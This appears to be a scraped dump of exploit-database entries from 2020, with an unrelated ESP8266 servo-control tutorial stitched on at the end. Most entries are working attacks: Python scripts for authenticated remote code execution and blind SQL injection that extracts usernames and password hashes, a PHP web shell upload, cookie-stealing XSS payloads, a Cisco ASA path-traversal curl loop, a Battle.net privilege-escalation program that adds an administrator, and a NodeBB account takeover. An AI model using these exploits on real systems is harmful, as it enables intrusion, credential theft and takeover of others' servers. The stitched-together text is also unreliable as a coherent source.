████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║ ██╔╝ ╚═══██║████╔╝██║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝ ███████╗███████║ ██║ █████╔╝╚██████╔╝ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚════╝ ╚═════╝ by: t0gu usage: main.py [-h] -p PASSWORD -l LOGIN -u URL ==> Exploit for CVE 2020-25790 optional arguments: -h, --help show this help message and exit -p PASSWORD, --password PASSWORD ==> admin password -l LOGIN, --login LOGIN ==> admin login -u URL, --url URL ==> main URL """ print(banner) menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790") menu.add_argument("-p", "--password", required=True, help="==> admin password") menu.add_argument("-l", "--login", required=True, help="==> admin login") menu.add_argument("-u", "--url", required=True, help="==> main URL") menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside") args = menu.parse_args() login = args.login password = args.password url = args.url file = args.file PROXIES = proxies = { "http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", } class Exploit: def __init__(self, login, password, url, file): self.login = login self.password = password self.url = url self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari" self.file = open(file, 'rb') def get_nounce(self): try: url = self.url + "/Admin" r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False) data = r.text soap_obj = BeautifulSoup(data, 'html.parser') for inp in soap_obj.find_all("input"): for v in inp: nounce = v['value'] if nounce != None or nounce != "": return nounce except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_hash_folders(self): cookie_auth = self.get_cookies() hash_verified = self.get_verified() data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1} try: url = self.url + "/Admin_Finder" r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False) json_data = r.json() hash_dir = json_data['files'][2]['hash'] return hash_dir except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_cookies(self): nounce = self.get_nounce() if nounce: try: url = self.url + "/Admin" data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '', 'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '', 'remember': 'on', 'verified': ''} r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False, headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'}) cookie_admin = r.headers['Set-Cookie'] cookie_name = cookie_admin.split(':')[0].split('=')[0] cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0] if cookie_name == None or cookie_name == "": if cookie_value == None or cookie_value == "": print("==> Something went wrong while login") else: data = f"{cookie_name}={cookie_value};" return data except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e: print(f'==> Error while login {e}') def upload_zip(self): url = self.url + '/Admin_Finder' hash_verified = self.get_verified() hash_dir = self.get_hash_folders() auth_cookie = self.get_cookies() try: print(f"==> Uploading file: {self.file}") data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified} r = requests.post(url=url, verify=False, timeout=10, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file}) hash_file = r.json()['added'][0]['hash'] self.extract_file(auth_cookie, hash_file, hash_verified) except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e: print(f"==> Error while uploading {e}") def extract_file(self, auth_cookie, hash_file, hash_verified): data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file} try: url = self.url + "/Admin_Finder" r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) name_file = r.json()['added'][0]['name'] print(f"==> All Hashes are collected from: {name_file}") self.xpl(auth_cookie,name_file) except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def xpl(self, auth_cookie, name_file): try: url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id" new_url = url.replace("index.php", "") print(f"==> Try to exploit: {new_url}") r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) pattern = r'<pre>(.*?)</pre>' m = re.search(pattern, r.text.replace("\n", "")) if m is not None and m != "": print(f"==> Vulnerable: {m.group(1)}") except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_verified(self): try: url = self.url + "/Admin/Uploaded" auth_cookie = self.get_cookies() r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) data = r.text pattern_regex = r'"verified":"(.*)"}' m = re.search(pattern_regex, data) if m is not None or m != "": return m.group(1) except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') if __name__ == "__main__": obj = Exploit(login, password, url, file) obj.upload_zip()

# Exploit Title: WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure # Exploit Author: Stefan Broeder, Marco Ortisi (redtimmysec) # Authors blog: https://www.redtimmy.com # Vendor Homepage: https://wpcoursesplugin.com/ # Version Vulnerable: < 2.0.29 # CVE: (requested but not assigned yet) WP Courses plugin < 2.0.29 does not protect the courses which could be accessed by unauthenticated users using the REST API (/wp-jon/) endpoints (for example /wp-json/wp/v2/lesson/{lesson_id}) This could result in attackers accessing paying content without authorization. Full story here: https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/

# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) # Google Dork: N/A # Date: 2020/10/19 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Vulnerable Pages: http://localhost/loan/index.php?page=loans http://localhost/loan/index.php?page=payments http://localhost/loan/index.php?page=borrowers http://localhost/loan/index.php?page=loan_type Proof of Concept: 1 - Go to vulnerable pages and using edit button (in the right, action column). 2 - And fill the blanks with "<script>alert(1)</script>" payload.

# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: CVE-2020-25760 # Description The file front.php does not perform input validation on the 'rid' paramter. An attacker can append SQL queries to the input to extract sensitive information from the database. Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how. #POC 1) Navigate to the login page Example: http://192.168.1.72/visitor_management/index.php 2) Enter 'username' and 'password' 3) On the homepage, click on any visitor name and intercept the request 4) Save the request to file. Example, visitor_management_sqli.req GET /visitor_management/front.php?rid=373568 HTTP/1.1 Host: 192.168.1.72 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.72/visitor_management/front.php Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef Upgrade-Insecure-Requests: 1 5) Run SQLmap on the file, sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10

# Exploit Title: User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS # Google Dork: N/A # Date: 2020-08-07 # Exploit Author: yusufmalikul # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ # Version: 2.1 # Tested on: Windows 10 # CVE : N/A Description User Registration & Login and User Management System With admin panel 2.1 application from PHPgurukul is vulnerable to Persistent XSS via the fname, lname, email, and contact field name when user register on the site then admin viewing user list on manage user page triggering the payload. POC User side 1. Go to the user registration page http://localhost/loginsystem 2. Enter <img src="x" onerror=alert(document.cookie)> in one of the field (first name, last name, email, or contact) 3. Click sign up Admin side 1. Login to admin panel http://localhost/loginsystem/admin 2. After login successful it will redirect to manage user page 3. Payload triggered

# Exploit Title: WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload # Date: 2020-10-20 # Exploit Author: Net-Hunter # Google Dork: N/A # Software Link: https://ms.wordpress.org/plugins/hs-brand-logo-slider/ # Vendor Homepage: https://www.heliossolutions.co/ # Tested on: Linux Apache / Wordpress 5.5.1 # Version: 2.1 .:: Description ::. An Authenticated User Can Bypass Uploader of the Plugin and Upload Arbitary File Because the extension of the Uploaded Flie is Checked on Client Side .:: Vulnerable File ::. /wp-admin/admin.php?page=hs-brand-logo-slider.php .:: Vulnerable Code ::. Content-Disposition: form-data; name="logoupload"; filename="a.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?> .:: Proof Of Concept (Poc) ::. Step 1 - Log in to your account , Select hs-brand-logo-slider from the menu Upload Step 2 - Stop the upload request with burp suite Step 3 - Rename the file, for example a.jpg to a.php Step 4 - Your shell has been uploaded, showing the file path in the table .:: Sample Request::. POST /wp-admin/admin.php?page=hs-brand-logo-slider.php HTTP/1.1 Host: 172.16.1.17:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://172.16.1.17:81/wp-admin/admin.php?page=hs-brand-logo-slider.php Content-Type: multipart/form-data; boundary=---------------------------407602771734524910834293111227 Content-Length: 81765 Origin: http://172.16.1.17:81 Connection: close Cookie: wordpress_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C15d778148be9d49e48b6275e009642192e10b1d8a9e5e44a191141084f2618b6; wp-settings-time-2=1592045029; wp-settings-2=libraryContent%3Dbrowse%26editor%3Dtinymce; wp_learn_press_session_558570ec66c8a5729fc0bd982edbc38a=9c5476d130f39254b97895578a6cf9e2%7C%7C1603353694%7C%7Cd6957c27eda7a311e486866587a08500; wordpress_test_cookie=WP+Cookie+check; wordpress_lp_guest=fad4f6783283c86762dc8944423947d0; wordpress_logged_in_558570ec66c8a5729fc0bd982edbc38a=admin%7C1603353703%7Ckvhq1mWuwe5MGz3wZpw8Rxi5eiJtxYMQDHzZFCkebGS%7C80d7786798b351d10cbdfe07ba50c31d2400ccbfb173d4b90255cab42791ccd7; wp-settings-time-1=1603180907 Upgrade-Insecure-Requests: 1 -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="brandname" aaa -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="logoupload"; filename="eftekharr.php" Content-Type: image/jpeg <?php echo system($_GET['cmd']); ?> -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="logourl" http://aa.com -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="sortorder" 1 -----------------------------407602771734524910834293111227 Content-Disposition: form-data; name="submit_data" Submit -----------------------------407602771734524910834293111227--

# Exploit Title: Ultimate Project Manager CRM PRO 2.0.5 - SQLi Credentials Leakage # Date: 2020-16-09 # Exploit Author: nag0mez # Vendor Homepage: https://ultimatepro.codexcube.com/ # Version: <= 2.0.5 # Tested on: Kali Linux 2020.2 # The SQLi injection does not allow UNION payloads. However, we can guess usernames and passwords fuzzing the database. #!/usr/bin/env python3 #-*- coding: utf-8 -*- import requests import sys # The original vulnerability was found on a server with an invalid SSL certificate, # which Python could not verify. I added the verify=False parameter to avoid SSL check. # The lack of verification results in a warning message from Python. # To get a clean output, we will ignore all warnings. import warnings warnings.filterwarnings("ignore") host = 'https://testurl.test' # Change url = "{}/frontend/get_article_suggestion/".format(host) chars = '1234567890abcdefghijklmnopqrstuvwxyz' hex_chars = 'abcdef1234567890' def send_payload(payload): try: response = requests.post(url, data=payload, verify=False) content = response.text length = len(content) return length except Exception as e: print('Cannot connect to host. Exit.') sys.exit(1) def get_first_user(): found = True known = '' while found: found = False for c in chars: test = known + c payload = {'search': "' or (select username from tbl_users limit 1)like'{}%'-- ".format(test)} length = send_payload(payload) if length > 2: found = True known += c print(c, end='') sys.stdout.flush() break return known def get_hash(username): found = True known = '' while found: found = False for c in hex_chars: test = known + c payload = {'search': "' or (select password from tbl_users where username='{}' limit 1)like'{}%'-- ".format(username,test)} length = send_payload(payload) if length > 2: found = True known += c print(c, end='') sys.stdout.flush() break return known if __name__ == '__main__': print('Exploit started.') print('Guessing username...') username = get_first_user() if username != '': print('\nUsername found: {}'.format(username)) else: print('\nCould not get username! Exit.') sys.exit(1) print('Guessing password SHA512 hash...') sha = get_hash(username) if sha != '': print('\nHash found: {}'.format(sha)) else: print('\nCould not get Hash! Exit.') sys.exit(1)

# Title: Online Students Management System 1.0 - 'username' SQL Injections # Exploit Author: George Tsimpidas # Date: 2020-10-09 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip # Version : 1.0 # Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) # Category: Webapp # Description The files index.php on the main login page, and the index.php on the /admin/ login page does not perform input validation on the regno and username parameters. An attacker can send malicious input in the post request to http://localhost/index.php or either http://localhost/admin/index.php and bypass authentication, extract sensitive information etc. #POC 1) Navigate to the admin login page Example: http://localhost/admin/index.php 2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool 3) Save the request to file. Example, student_record_sqli.req POST /admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 32 Origin: http://localhost DNT: 1 Connection: close username=admin&password=dummy 4) Run SQLmap on the file, sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username

# Exploit Title: berliCRM 1.0.24 - 'src_record' SQL Injection # Google Dork: N/A # Date: 2020-10-11 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.berlicrm.de # Software Link: https://github.com/berliCRM/berlicrm/archive/1.0.24.zip # Version: 1.0.24 # Tested on: Kali Linux # CVE : N/A ========== Post Request ========================= POST /index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: localhost Cookie: PHPSESSID=bab89b6fc39e1fd2c26877a4544cbb64 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 226 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 Connection: Keep-alive __vtrftk=sid:ff114f440469f69f1507ebd04c65e05ba2fcc8d3%2C1602392658&module=Contacts&src_field=contact_id&src_module=Contacts&src_record=1&triggerEventName=postSelection721&view=Popup ============= Vulnerable Parameter =============== src_record (POST) ============= Payload =========================== 0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z

# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal # Date: 2020-10-10 # Exploit Author: 3ndG4me # Vendor: www.cisco.com # Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html # CVE : CVE-2020-3452 TARGET=$1 CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen" mkdir cisco_asa_files if [ -z "$1" ]; then echo "Usage: cve-2020-3452.sh <target ip/hostname>" echo "Example: cve-2020-3452.sh mytarget.com" echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory" echo "Target not specificed...exiting..." else for FILE in $CISCO_KNOWN_FILES; do curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE; done fi

#!/usr/bin/python3 # Exploit Title: TimeClock Software 1.01 Authenticated Time-Based SQL Injection # Date: July 21, 2020 # Exploit Author: François Bibeau # Co Author: Tyler Butler, http://tbutler.org, https://twitter.com/tbutler0x90 # Vendor Homepage: http://timeclock-software.net/ # Software Link: http://timeclock-software.net/timeclock-download.php # Version: 1.01 # Tested on: Ubuntu 18.04.3 (LTS) x64, mysql 5.7, php 7.2.1-apache import time import requests login_url = 'http://159.203.41.34/login_action.php' # Ensure to change ip to match target login_data = {'username':'fred','password':'fred','submit':'Log In'} headers = {'User-Agent': 'Mozilla/5.0'} # init session & login session = requests.Session() session.post(login_url,headers=headers,data=login_data) # static list provided for PoC, could use a text file users = ['john','bill','tim','fred','garry','sid','admin'] for user in users: url = "http://159.203.41.34/add_entry.php" payload = f"' OR IF((SELECT username FROM user_info WHERE username='{user}')='{user}', SLEEP(5), NULL)='" data = {'data_month': '1', 'data_day': '1', 'data_year': '1', 'type_id': '5', 'hours': '1', 'notes': payload, 'submit': 'Add'} print(f'Checking user {user}... ', end = '') start = time.time() response = session.post(url,data=data) end = time.time() delay = end - start if delay > 5: print('User found!') else: print('')

# Exploit Title: Battle.Net 1.27.1.12428 - Insecure File Permissions # Date: 2020-10-09 # Exploit Author: George Tsimpidas # Software Link : https://www.blizzard.com/en-gb/download/ ( Battle Net Desktop ) # Version Patch: 1.27.1.12428 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 # Category: local Vulnerability Description: Battle.Net Launcher (Battle.net.exe) suffers from an elevation of privileges vulnerability which can be used by a simple user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Users' group, making the entire directory 'Battle.net' and its files and sub-dirs world-writable. ## Insecure Folder Permission C:\Program Files (x86)>icacls Battle.net Battle.net BUILTIN\Users:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) CREATOR OWNER:(OI)(CI)(F) ## Insecure File Permission C:\Program Files (x86)\Battle.net>icacls "Battle.net.exe" Battle.net.exe BUILTIN\Users:(I)(F) BUILTIN\Administrators:(I)(F) FREY-OMEN\30698:(I)(F) ## Local Privilege Escalation Proof of Concept #0. Download & install #1. Create low privileged user & change to the user ## As admin C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the Service EXE to a new name C:\Program Files (x86)\Battle.net> whoami lowpriv C:\Program Files (x86)\Battle.net> move Battle.net.exe Battle.frey.exe 1 file(s) moved. #3. Create malicious binary on kali linux ## Add Admin User C Code kali# cat addAdmin.c int main(void){ system("net user placebo mypassword /add"); system("net localgroup Administrators placebo /add"); WinExec("C:\\Program Files (x86)\\Battle.net\\Battle.frey.exe>",0); return 0; } ## Compile Code kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o Battle.net.exe #4. Transfer created 'Battle.net.exe' to the Windows Host #5. Move the created 'Battle.net.exe' binary to the 'C:\Program Files (x86)\Battle.net>' Folder C:\Program Files (x86)\Battle.net> move C:\Users\lowpriv\Downloads\Battle.net.exe . #6. Check that exploit admin user doesn't exists C:\Program Files (x86)\Battle.net> net user placebo The user name could not be found #6. Reboot the Computer C:\Program Files (x86)\Battle.net> shutdown /r #7. Login & look at that new Admin C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None

# Exploit Title: NodeBB Forum 1.12.2-1.14.2 - Account Takeover # Date: 2020-08-18 # Exploit Author: Muhammed Eren Uygun # Vendor Homepage: https://nodebb.org/ # Software Link: https://github.com/NodeBB/NodeBB # Version: 1.12.2-1.14.2 # Tested on: Linux # CVE : CVE-2020-15149 - https://github.com/NodeBB/NodeBB/security/advisories/GHSA-hr66-c8pg-5mg7 Impact: ---------------------- A bug in this validation logic made it possible to change the password of any user on a running NodeBB forum by sending a specially crafted socket.io call to the server. This could lead to a privilege escalation event due via an account takeover. Bug PoC: ---------------------- Blog: https://medium.com/bugbountywriteup/privilege-escalation-via-account-takeover-on-nodebb-forum-software-512-a593a7b1b4a4 1- Create a user 2- Go to password change page 3- Change password with proxy 427["user.changePassword",("currentPassword":"Test.12345!","newPassword":"Admin123!","uid":5)]) 4- Replace the uid on the request with 1, which is the uid value of the admin user, and send the request. 5- So you can login with this password to admin user.

In this article, we will use Xiao Ai to control the SG90 servo. This can simply realize some operations such as opening the door and opening the light using the servo. Material preparation ESP8266SG90 servo DuPont line Line connection Three wires of the servo machine: Yellow wire->connect signal (D4), red wire->connect positive electrode (5V), brown wire->connect negative electrode (G) effect Code #include Servo.h #define BLINKER_WIFI #define BLINKER_MIOT_OUTLET #include Blinker.h char auth[]='064****a9'; //key char ssid[]='PDCN'; //wifi name char pswd[]='1234567890'; //wifi password //Create a new component object BlinkerButton Button1('btn-max'); //Maximum button BlinkerButton Button2('btn-min'); //Minimum value button Servo myservo; BlinkerSlider Slider3('ser-num'); //Real-time position Slider Data key name Range 1-180 int servo_max,servo_min,ser_num,time_num; void button1_callback(const String state) { //Maximum button function BLINKER_LOG('get button state: ', servo_max); myservo.write(servo_max); Blinker.vibrate(); } void button2_callback(const String state) { //Minimum button function BLINKER_LOG('get button state: ', servo_min); myservo.write(servo_min); Blinker.vibrate(); } void slider3_callback(int32_t value) //Slider function { ser_num=value; myservo.write(ser_num); Blinker.delay(100); BLINKER_LOG('get slider value: ', value); } //Little Love Function void miotPowerState(const String state) { BLINKER_LOG('need set power state: ', state); if (state==BLINKER_CMD_ON) { BLINKER_LOG('get button state: ', servo_max); myservo.write(servo_max); Blinker.vibrate(); } else if (state==BLINKER_CMD_OFF) { BLINKER_LOG('get button state: ', servo_min); myservo.write(servo_min); Blinker.vibrate(); } } void setup() { Serial.begin(115200); BLINKER_DEBUG.stream(Serial); Blinker.begin(auth, ssid, pswd); Button1.attach(button1_callback); Button2.attach(button2_callback); Slider3.attach(slider3_callback); BlinkerMIOT.attachPowerState(miotPowerState); myservo.attach(2); //servo.attach(): Set the servo data pin myservo.write(10); //servo.write(): sets the rotation angle servo_max=150;//The degree of rotation, here my range is 0-150° servo_min=0; time_num=500; } void loop() { Blinker.run(); } Regarding the pins, please refer to the figure below Effect